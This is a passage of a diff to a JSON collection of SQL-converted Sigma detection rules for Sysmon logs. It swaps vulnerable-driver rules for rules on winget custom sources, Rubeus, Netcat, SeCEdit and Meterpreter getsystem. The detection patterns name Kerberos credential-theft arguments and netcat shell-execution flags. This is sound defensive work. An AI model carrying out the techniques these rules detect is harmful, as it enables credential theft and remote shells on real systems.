'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', 
'6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 
'71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 
'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', 
'5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 
'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 
'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. 
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": 
"proc_creation_win_pua_netcat.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN 
('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR 
CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN 
